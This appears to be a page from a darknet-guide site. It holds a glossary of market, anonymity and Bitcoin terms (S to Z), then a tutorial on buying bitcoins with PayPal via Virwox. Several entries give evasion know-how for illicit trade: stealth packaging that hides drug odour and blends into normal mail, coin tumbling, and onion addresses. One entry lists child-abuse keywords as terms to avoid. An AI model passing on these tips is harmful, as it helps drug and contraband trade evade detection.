    Same Same But Different (SSBD) – Peter Phillip Nash, who was arrested in Australia and accused of being one of the Silk Road moderators. You can read the full details about the moderators bust in this post.

    Samples – In the context of a market, a free or low cost item sent to a well known buyer in order to establish legitimacy. This proves that at least the seller has access to a product and is capable of delivering it in a secure way. The receiving party is expected to leave public feedback regarding the quality of the product and how well it has been packaged.

    Satoshi Nakamoto – A pseudonym of the person or group of people who created Bitcoin and anonymously published its source code.

    Shared Send – A free method to tumble Bitcoins provided by blockchain.info. It routes transactions through a shared wallet breaking the chain of transactions.

    Scammer – One who would attempt to defraud either a vendor or seller. For a vendor this can take the form of simply not ever sending products, sending poor quality or misrepresented products, or ‘selective scamming’ (See other entry).

    Selective Scamming – Where known individuals are sent product but large transactions or those from unknowns are not sent out. For a seller, this will mean that they claim to have not received goods that were delivered or that the goods were of poor quality/misrepresented.

    Search (ability you must have) = http://lmgtfy.com/?q=search

    Sheep – Second big online market to fail. Vendors flocked to the site citing its well polished vending design, and users followed. Disappeared without a trace, taking all funds in escrow with it. Despite the manhunt that followed, it remains unclear whether it was a deliberate scam, a result of being hacked, or a combination of the two.

    Shipping – Process of a vendor packaging and sending goods. A source of extreme difficulty for vendors, and how many have been caught. Ideal methods will appear to be legitimate business-to-individual packages and correspondence. It is considered poor form to disclose any specifics of a shipment made, as it could be used to target a vendor.

    Shilling – Creating accounts on Reddit / forums for the sole purpose of posting positive / negative posts about someone or something while trying to make them look authentic.

    Silk Road – ‘The eBay of illegal goods’. First reported to a wide audience by Gawker on 2011-06-01, it flourished due to a large vendor and user base, and strict controls to weed out scammers. Taken down after the arrest of Ross Ulbricht at the start of October 2013. While it was neither the first nor the last market for illegal items, none have matched its popularity and the trust level given by vendors and users.

    SIGAINT – Tor-based darknet email service that allows you to send email without revealing your location or identity.  Its name is derived from SIGINT (“Signals Intelligence”), which refers to intelligence-gathering by interception of signals.

    Silk Road 2.0 – The successor of the first Silk Road. Was seized during Operation Onymous, and Blake Benthall the alleged admin of the site (Defcon) was arrested.

    SMAC – a tool that can change your MAC address

    SMS4Tor – Self-destructing messages. Similar to Privnote but for Tor. I prefer this because it’s an onion address AND does not require javascript (Privnote requires JS). You type out a message on their site, create a custom link, and share it to another user. The link will only work once, and so whoever opens it first is the only one who can read it. A great alternative to PGP as it is much more user-friendly. Very secure when combined with PGP encryption. *This one’s a little harder to find but if you google “self destruct message tor” you should be able to find it.

    Stats (Buyer) – statistics used to determine legitimacy of buyers/sellers. Common are number of successful transactions, average reviews, and dollar amounts of successful transactions in total. These are usually imprecise in order to avoid anybody being profiled.

    Stealth – Methods used by vendors during packaging to make them blend in with normal mail. Disclosing any particular method of stealth is considered extremely poor form. Examples of stealth methods include making the item appear to come from a legitimate, known business; hiding the product in another, nondescript looking item; and using moisture barrier bags or mylar to eliminate product odor from being emitted from the package. Ideally, you would be able to open the item and give a cursory inspection of all the contents and find nothing unusual, but in practice this can vary greatly.

    Sub Reddits – one of the subforums from the popular reddit.com community. Many times shortened to r/subredditname in common discussion. A team of administrators that are usually not affiliated with reddit determines the content policy of the sub reddit, with the website taking a very hands off approach.

    SQL injection – A database code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. Many markets got shut down or lost their money because of this type of attack.

    Tails – Are you using just the Tor Browser Bundle? Then consider TAILS, an operating system specially made for anonymous activities that you boot from a CD or USB stick. It leaves no traces on your computer and has plenty of built-in tools that come in handy. *Check out their website: search “Tails boum” and you should find it very easily.

    Talk.masked/core.onion – 2 of the first major forums in Onionland besides Onionforum.

    The Marketplace (i2p) – Market set up on the I2P network. Defined by its use of an alternate anonymity network and of P2SH addresses to hold all funds in escrow during the ordering process. Tends to be either praised for its security or derided for the bugs and non-intuitiveness that its model brings. You can find a full usage guide here.

    Tony76 — Was a trusted vendor on SR1, then ran a massive “FE” scam (you can read the full story here). The FBI accuses DPR of placing a hit on the individual using this pseudonym. He scammed a large number of Silk Road users, but his true identity and whether or not he was killed are still in dispute.

    Tor – The Onion Router. Uses ‘onion routing’ to provide anonymous access to the Internet by encrypting a message several times, with each relay removing one layer before the final destination is reached. Funded heavily by the US government, its security has been the focus of much academic research, with no serious known issues or backdoors discovered yet. Used by journalists, government censors, and more to hide their true location and identity.

    Torchat – IM service that works by having each user set up a ‘hidden service’ that can be used to contact them via Tor. Somewhat similar in purpose to OTR, but messages do not have plausible deniability.

    Torch – Tor Search Engine (http://xmh57jrzrnw6insl.onion/) is your light in the dark net. Make sure to bookmark it if you want to wander the depths beyond your favorite markets.

    Tormarket – Another market to rise and fall after SR’s demise. Not as big as Sheep, but the timing made many very cautious about the reliability of new markets.

    Tormail – Tor Mail was a Tor hidden service that allowed users to send and receive email anonymously, to email addresses inside and outside the Tor network. The service was seized by the FBI as part of the Freedom Hosting bust in August 2013.

    Tor Browser Bundle (TBB) – A modified version of Firefox that allows people to easily use the Tor anonymity network. It is compatible with Windows, OS X, and Linux.

    Tor Exit Node – The last relay that data traveling from its originator (a computer) to the recipient (a web server) travels through before reaching the recipient. To the recipient, traffic appears to originate from the exit node.

    Tor Node – A data relay, either a connection point, a redistribution point (middle node), or an endpoint (exit node).

    TS/LS/OPVA/pthc/PB/ptsc/petersburg/anything relating to a child/swirlface/[email protected] – AVOID. CP keywords.

    Tumble – a method to anonymize the source of your bitcoins.

    TrueCrypt – Open source application used to encrypt storage devices such as hard drives and USB flash drives. It is also used to create encrypted virtual disks contained in a file that mount similarly to real storage devices.

    Tx ID – Bitcoin transaction ID

    Utopia marketplace – Market that had some connection to BMR (although the nature of the connection is somewhat unclear). Had the advantage of being fully stocked with former BMR vendors at its public launch. Rapidly taken down by the Dutch police not long after it was unveiled to the public.

    Vendors – Those who sell product on a market. This may be of an illegal nature, semi-legal nature, or completely legal nature. Because a vendor will be given a buyer’s full information to send the product to, any new vendor is under heavy scrutiny of being a scam or a ‘honeypot’ set up by law enforcement. Because of the difficult nature of the work, quality vendors tend to develop a cult following.

    Vendors Roundtable – A vendor only discussion forum on Silk Road 1/2 forums. Used on a site to allow vendors to bring up issues about the market or buyers without raising alarm in the general populace.

    VPN – Virtual Private Network. In the context of anonymous activity, this is usually a proxy that purports to be anonymous in nature to hide the end user’s identity. Generally used either to hide the fact that one is connecting to an anonymous network like Tor, or to hide the fact that one is using an anonymous network like Tor (as many websites will block Tor outproxies). A VPN does not provide true security, as there is no way to know whether the operator is keeping logs.

    Whonix – (http://zo7fksnun4b4v4jv.onion) is a Debian based operating system focused on anonymity, privacy and security by isolation. Whonix consists of two parts: one solely runs Tor and is called the Gateway. The other, the Workstation, is on a completely isolated network. Only connections through Tor are possible.

    Whistleblowing – The disclosure by a person, usually an employee in a government agency or private enterprise, to the public or to those in authority, of mismanagement, corruption, illegality, or some other wrongdoing.

    ZULU Time – UTC-0 Western European time zone.

    Buy Bitcoins With Paypal!

    Paypal is one of the most trusted and popular services for online transactions these days. Paypal is everywhere now, as many merchants and traders have adopted it with open arms.

    Bitcoin is another method of conducting online transactions, which has carved out its own place in the market. Bitcoin is a decentralized, digital currency, with a fixed supply, that reduces the need for using physical or hard money.

    On one hand, Paypal makes online, fiat transactions fast and easy. On the other hand, Bitcoin is both a currency and payment system that operates independently of the fiat monetary system, thereby making online purchases more like an equivalent of cash purchases in the real world—whereas Paypal is merely an intermediary between the Internet and a Physical bank.

    The speed, security, and convenience of Bitcoin has of course created an ever-increasing demand for the digital currency. As a result, online Bitcoin exchanges—a popular avenue for buying and selling bitcoins—have popped up in droves.

    However, one may ask the question: can I buy bitcoins using Paypal, so I do not have to directly link my bank account to a Bitcoin exchange? Yes, here’s how:

    Successfully Buying Bitcoins With Paypal

    Many people who have used Bitcoin and Paypal say that using Paypal to buy Bitcoin is a very difficult process. If we take a glance at the previous track record of buying Bitcoin via Paypal, we will see that people have indeed faced many inconveniences with Paypal. These difficulties arise due to recurring situations where a person uses Paypal to buy Bitcoin, and then initiates a chargeback, in which the person claims to never have received the bitcoins, and demands a refund from the Bitcoin seller. It is said that Paypal often favors fraudulent merchants, so most Bitcoin traders expect this system to be dangerous with a high chance of having their money stolen, and may opt to refrain from purchasing bitcoins through Paypal.

    It is possible to successfully use Paypal to buy bitcoins, though, and sell them at higher prices through online marketplaces such as LocalBitcoins and eBay. There are two methods that will allow one to buy bitcoins with Paypal: Virwox or credit cards. Virwox charges a commission fee for using its services, but it is by far easier to buy bitcoins through Paypal with Virwox than by using a credit card. Therefore, we will show you how to use Virwox to successfully buy bitcoins through Paypal.

    How to Buy Bitcoins With Paypal by Using Virwox

    We have created a tutorial to explain the Virwox method—here is a general overview of the steps you will have to take to use this process:

    – Visit the website Virwox.com
    – Register for an account on that website.
    – Then, add funds to your Virwox account via Paypal
    – Buy Linden$ (SLL) with USD/EUR
    – Buy bitcoins with your Linden$ (SLL)
    – Finally, send your bitcoins to your wallet.

    *Note: Linden$ is the virtual currency used in the online game “Second Life”.

    Step 1: Visit the official website of Virwox and register for an account. You need to ignore the message, “your avatar connection has not been validated yet.”



    Step 2: Click on the “Deposit” button on the sidebar:


    Step 3: Choose how you want to deposit your money—you can use Paypal or credit cards via Skrill payment. Note that you can only deposit limited amounts of money every 24 hours. Your 24 hour deposit limit will be raised as you complete successful transactions. A failed transaction will still be deducted from your daily limit, so be careful with the details you enter while preparing your Paypal or credit card payments.


    Step 4: Once you finish your deposit, you need to convert the USD or EUR to SLL. Just click the “place a sell order” button or click the USD/SLL button on the sidebar:


    Step 5: Choose how much USD you want to convert to SLL and click “Next.”


    Step 6: After Clicking “Next,” you need to confirm your order.


    Step 7: After you have converted your USD to SLL, all that is left to do is to convert the SLL to BTC. To do this, just click on the “BTC/SLL” button on the sidebar.


    Step 8: On the next screen, enter the amount of bitcoins you want to buy using your SLL.


    Step 9: After your transaction has been confirmed, you will be able to withdraw your bitcoins and send them to your wallet; click the “Withdraw” button on the sidebar.


    Step 10: Enter the amount of bitcoins you want to withdraw, then enter your Bitcoin address and click the “Request Withdraw” button. Note: on your first withdrawal there may be a 48 hour delay until your bitcoins are sent to your wallet. This delay is in place to help prevent fraud. After your first transaction, though, the withdrawal will be instant, and it can be traced in the blockchain.


    In conclusion, this method is the easiest way to buy bitcoins using Paypal and credit cards; the only disadvantages are the fees (Paypal fees, lower rates for BTC & SLL).
